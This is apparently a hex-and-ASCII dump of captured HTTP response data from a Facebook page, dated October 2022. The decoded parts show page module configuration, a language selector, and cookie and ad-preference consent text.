                                                                                                                                  Data Ascii: ","dZvLikh","nMFWzLX","Yv35Of2","HNJlz0f","cYU3c32","3OgSJE4","sjCQeza","owesA3P","Ufq6YWX","ApG5VK4"],"rds":{"m":["Animation","VisualCompletionGating","FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions"]},"be":1},"PhotoTagger"
                                                                                                                                  2022-10-17 20:07:22 UTC1534INData Raw: 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 41 63 6d 5a 31 35 6d 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 6c 77 54 35 51 78 77 22 2c 22 52 4d 34 4d 52 34 6e 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 41 39 63 69 56 42 39 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 39 79 6f 4e 79 58 58 22 2c 22 4c 70 33 36 59 58 54 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 51 4d
                                                                                                                                  Data Ascii: ing","IntlQtEventFalcoEvent"]},"be":1},"AsyncDialog":{"r":["vcBcJjw","AcmZ15m","R5w1rCJ","ZEC4RrQ","EF1hWl5","lwT5Qxw","RM4MR4n","+RGtM0o","A9ciVB9","X9nr65a","PMEs\/oy","KAjbrl\/","Z2GjVu9","hyKmpuu","o\/unyrn","eMkMxHZ","9yoNyXX","Lp36YXT","lWOvGTa","QM
                                                                                                                                  2022-10-17 20:07:22 UTC1535INData Raw: 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 45 78 63 65 70 74 69 6f 6e 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 5a 36 4b 4e 6e 34 51 22 2c 22 76 63 42 63 4a 6a 77 22 2c 22 41 63 6d 5a 31 35 6d 22 2c 22 5c 2f 48 56 34 42 34 58 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 6c 77 54 35 51 78 77 22 2c 22 52 4d 34 4d 52 34 6e 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 41 39 63 69 56 42 39 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 65
                                                                                                                                  Data Ascii: ","PageTransitions","BanzaiScuba_DEPRECATED"]},"be":1},"ExceptionDialog":{"r":["Z6KNn4Q","vcBcJjw","AcmZ15m","\/HV4B4X","R5w1rCJ","ZEC4RrQ","EF1hWl5","lwT5Qxw","RM4MR4n","+RGtM0o","A9ciVB9","X9nr65a","PMEs\/oy","KAjbrl\/","Z2GjVu9","hyKmpuu","o\/unyrn","e
                                                                                                                                  2022-10-17 20:07:22 UTC1537INData Raw: 35 4f 66 32 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 6f 77 65 73 41 33 50 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 46 6f 6f 74 65 72 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 5c 2f 48 56 34 42 34 58 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 75 64 69 74 64 6f 71 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 6f 77 65 73 41 33 50 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 54 69 74 6c 65 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 45 46 31 68 57 6c 35
                                                                                                                                  Data Ascii: 5Of2","sjCQeza","owesA3P"],"be":1},"XUIDialogFooter.react":{"r":["vcBcJjw","\/HV4B4X","R5w1rCJ","PMEs\/oy","KAjbrl\/","hyKmpuu","o\/unyrn","uditdoq","Yv35Of2","sjCQeza","owesA3P"],"be":1},"XUIDialogTitle.react":{"r":["vcBcJjw","R5w1rCJ","ZEC4RrQ","EF1hWl5
                                                                                                                                  2022-10-17 20:07:22 UTC1538INData Raw: 6c 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 75 70 70 6f 72 74 73 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 3a 74 72 75 65 2c 22 64 65 66 61 75 6c 74 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 73 77 69 74 63 68 65 64 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 22 2c 22 6e 6f 6e 5f 6c 69 6e 6b 73 68 69 6d 5f 6c 6e 66 62 5f 6d 6f 64 65 22 3a 6e 75 6c 6c 2c 22 6c 69 6e 6b 5f 72 65 61 63 74 5f 64 65 66 61 75 6c 74 5f 68 61 73 68 22 3a 22 41 54 30 30 53 62 74 39 69 64 58 55 32 55 34 4d 58 41 52 6a 37 49 64 7a 31 62 64 68 4f 0d 0a 31 62 34 30 0d 0a 55 35 50 66 36 67 73 58 4f 35 4f 5f 62 4c 4a 4e 70 6d
                                                                                                                                  Data Ascii: lerConfig",[],{"supports_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","non_linkshim_lnfb_mode":null,"link_react_default_hash":"AT00Sbt9idXU2U4MXARj7Idz1bdhO1b40U5Pf6gsXO5O_bLJNpm
                                                                                                                                  2022-10-17 20:07:22 UTC1540INData Raw: 30 37 39 5f 30 5f 39 5f 37 43 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 50 47 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 74 42 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 36 54 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 39 68 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 65 5f 51 7a 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 66 5f 68 4e 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 67 5f 4b 5a 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 39 70 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 50 4b 22 2c
                                                                                                                                  Data Ascii: 079_0_9_7C","__markup_3310c079_0_a_PG","__markup_3310c079_0_b_tB","__markup_3310c079_0_c_6T","__markup_3310c079_0_d_9h","__markup_3310c079_0_e_Qz","__markup_3310c079_0_f_hN","__markup_3310c079_0_g_KZ","__markup_3310c079_0_h_9p","__markup_3310c079_0_i_PK",
                                                                                                                                  2022-10-17 20:07:22 UTC1541INData Raw: 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 52 65 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 73 5f 4c 41 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 4b 31 22 7d 2c 22 6c 61
                                                                                                                                  Data Ascii: ctableItem"},"markup":{"__m":"__markup_3310c079_0_4_Re"},"label":"English (US)","title":"","className":"headerItem"},{"class":"headerItem","value":"es_LA","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_5_K1"},"la
                                                                                                                                  2022-10-17 20:07:22 UTC1543INData Raw: 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 6c 5f 50 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 36 54 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 50 6f 6c 73 6b 69 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 74 5f 42 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f
                                                                                                                                  Data Ascii: ,{"class":"headerItem","value":"pl_PL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_c_6T"},"label":"Polski","title":"","className":"headerItem"},{"class":"headerItem","value":"pt_BR","selected":false,"ctor":{"_
                                                                                                                                  2022-10-17 20:07:22 UTC1544INData Raw: 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 34 41 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 54 5c 75 30 30 66 63 72 6b 5c 75 30 30 65 37 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 63 73 5f 43 5a 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6b 5f 4f 42 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 31 30 63 65 5c 75 30 31 36 31 74 69 6e 61 22 2c 22 74 69 74 6c 65 22 3a 22
                                                                                                                                  Data Ascii: _3310c079_0_j_4A"},"label":"T\u00fcrk\u00e7e","title":"","className":"headerItem"},{"class":"headerItem","value":"cs_CZ","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_k_OB"},"label":"\u010ce\u0161tina","title":"
                                                                                                                                  2022-10-17 20:07:22 UTC1545INData Raw: 32 61 35 30 0d 0a 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 70 5f 59 2b 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39 33 66 5c 75 30 39 32 38 5c 75 30 39 34 64 5c 75 30 39 32 36 5c 75 30 39 34 30 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 68 5f 54 48 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f
                                                                                                                                  Data Ascii: 2a50N","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_p_Y+"},"label":"\u0939\u093f\u0928\u094d\u0926\u0940","title":"","className":"headerItem"},{"class":"headerItem","value":"th_TH","selected":false,"ctor":{"_
                                                                                                                                  2022-10-17 20:07:22 UTC1547INData Raw: 43 6f 72 6e 65 72 22 7d 5d 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 5f 35 37 64 69 22 2c 22 6d 61 78 68 65 69 67 68 74 22 3a 35 30 30 2c 22 74 68 65 6d 65 22 3a 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 54 68 65 6d 65 22 7d 7d 5d 2c 33 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 64 70 22 2c 5b 22 44 69 61 6c 6f 67 58 22 2c 22 4c 61 79 65 72 46 61 64 65 4f 6e 48 69 64 65 22 2c 22 44 69 61 6c 6f 67 48 69 64 65 4f 6e 53 75 63 63 65 73 73 22 2c 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 4c 61 79 65 72 52 65 6d 6f 76 65 4f 6e 48 69 64 65 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 72 37 22 2c 22 48 54 4d 4c 22 5d 2c 5b 7b 22 77 69 64 74 68 22 3a 36 38 30 2c 22 61 75
                                                                                                                                  Data Ascii: Corner"}],"className":"_57di","maxheight":500,"theme":{"__m":"XUIMenuTheme"}}],3],["__inst_ead1e565_0_0_dp",["DialogX","LayerFadeOnHide","DialogHideOnSuccess","LayerHideOnTransition","LayerRemoveOnHide","__markup_9f5fac15_0_0_r7","HTML"],[{"width":680,"au
                                                                                                                                  2022-10-17 20:07:22 UTC1548INData Raw: 35 30 66 34 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6c 32 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6c 33 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 51 76 36 44 33 48 54 65 5a 55 59 20 73 78 5f 35 37 37 63 36 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 36 61 20 75 69 50 6f 70 6f 76 65 72 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 37 5f 32 38 5c 22 3e 5c 75 30 30 33 43 61 20 72 6f 6c 65 3d 5c 22 62 75 74 74 6f 6e 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 35 70 69 20 5f 32 61 67 66 20 5f 34 6f 5f 34 20 5f 39 6f 2d 65 20 5f 70 20 5f 34 6a 79 33 20 5f 35 31 37 68 20 5f 35 31 73 79 5c
                                                                                                                                  Data Ascii: 50f4\">\u003Cdiv class=\"_9xl2\">\u003Cdiv class=\"_9xl3\">\u003Ci class=\"img sp_Qv6D3HTeZUY sx_577c60\">\u003C\/i>\u003Cdiv class=\"_6a uiPopover\" id=\"u_0_7_28\">\u003Ca role=\"button\" class=\"_42ft _4jy0 _55pi _2agf _4o_4 _9o-e _p _4jy3 _517h _51sy\
                                                                                                                                  2022-10-17 20:07:22 UTC1550INData Raw: 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 46 6f 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 61 6e 64 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 73 65 72 76 69 63 65 73 20 6f 66 66 20 6f 66 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2c 20 77 65 20 75 73 65 20 74 6f 6f 6c 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65
                                                                                                                                  Data Ascii: _9xo0\">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Facebook Products, analytics, and to provide certain features and improve our services for you, we use tools from other companies on Facebook. These companies also use
                                                                                                                                  2022-10-17 20:07:22 UTC1551INData Raw: 65 73 20 66 6f 72 20 79 6f 75 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 70 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 39 5f 56 4a 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76
                                                                                                                                  Data Ascii: es for you. These companies also use cookies.\u003C\/div>\u003C\/div>\u003Cp>\u003C\/p>\u003Cdiv class=\"_9vtg\" id=\"u_0_9_VJ\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv
                                                                                                                                  2022-10-17 20:07:22 UTC1553INData Raw: 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 74 68 65 72 20 77 61 79 73 20 79 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 61 5f 6a 35 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e
                                                                                                                                  Data Ascii: \u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Other ways you can control your information\u003C\/p>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_a_j5\">\u003Cbutton class=\"_9ngd _9n
                                                                                                                                  2022-10-17 20:07:22 UTC1554INData Raw: 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 74 68 69 73 20 69 6e 20 79 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 70 72 65 66 65 72 65 6e 63 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 75 73 65 20 79 6f 75 72 20 61 64 20 70 72 65 66 65 72 65 6e 63 65 73 20 74 6f 20 6c 65 61 72 6e 20 77 68 79 20 79 6f 75 26 23 30 33 39 3b 72 65 20 73 65 65 69
                                                                                                                                  Data Ascii: You can control this in your \u003Ca href=\"https:\/\/www.facebook.com\/settings\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9si-\">Ad preferences\u003C\/p>\u003Cp class=\"_9o-m\">You can use your ad preferences to learn why you&#039;re seei
                                                                                                                                  2022-10-17 20:07:22 UTC1556INData Raw: 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 6f 70 74 20 6f 75 74 20 6f 66 20 73 65 65 69 6e 67 20 6f 6e 6c 69 6e 65 20 69 6e 74 65 72 65 73 74 2d 62 61 73 65 64 20 61 64 73 20 66 72 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 69 63 69 70 61 74 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 74 68 72 6f 75 67 68 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c
                                                                                                                                  Data Ascii: utton>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">You can opt out of seeing online interest-based ads from Facebook and other participating companies through the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\
                                                                                                                                  2022-10-17 20:07:22 UTC1556INData Raw: 33 32 37 37 0d 0a 4f 48 45 61 63 4f 78 72 47 69 49 51 4a 6e 52 78 42 63 44 4f 6e 41 55 44 31 4a 62 76 7a 66 50 52 73 54 5a 35 42 52 77 6d 78 6f 31 6f 34 38 65 54 6a 50 46 55 61 5f 68 64 5f 74 6a 4c 55 55 4f 59 47 48 6e 6c 6a 74 73 55 57 36 71 68 57 32 30 6b 46 73 34 51 68 63 54 33 38 6a 47 37 70 49 49 6a 2d 54 7a 30 63 6e 6b 70 63 4a 5f 73 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 74 68 65 20 55 53 2c 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72
                                                                                                                                  Data Ascii: 3277OHEacOxrGiIQJnRxBcDOnAUD1JbvzfPRsTZ5BRwmxo1o48eTjPFUa_hd_tjLUUOYGHnljtsUW6qhW20kFs4QhcT38jG7pIIj-Tz0cnkpcJ_sg\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance\u003C\/a> in the US, the \u003Ca hr
                                                                                                                                  2022-10-17 20:07:22 UTC1557INData Raw: 20 6f 66 66 65 72 2c 20 79 6f 75 20 63 61 6e 20 72 65 76 69 65 77 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 72 65 73 6f 75 72 63 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 71 5c 22 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 70 39 68 48 63 5a 7a 74 64 7a 74 76 53 72 6a 6d 37 44 6b 57 6e 4a 7a 6e 59 6a 36 4f 6e 77 45 44 72 41 63 61 45 53 69 2d 39 58 47 65 4c 32 34 46
                                                                                                                                  Data Ascii: offer, you can review the following resources:\u003C\/p>\u003Cul class=\"_9o-q\">\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&amp;h=AT2p9hHcZztdztvSrjm7DkWnJznYj6OnwEDrAcaESi-9XGeL24F
                                                                                                                                  2022-10-17 20:07:22 UTC1559INData Raw: 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 43 6f 6e 74 72 6f 6c 6c 69 6e 67 20 63 6f 6f 6b 69 65 73 20 77 69 74 68 20 62 72 6f 77 73 65 72 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 51 76 36 44 33 48 54 65 5a 55 59 20 73 78 5f 33 61 36 38 31 38 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 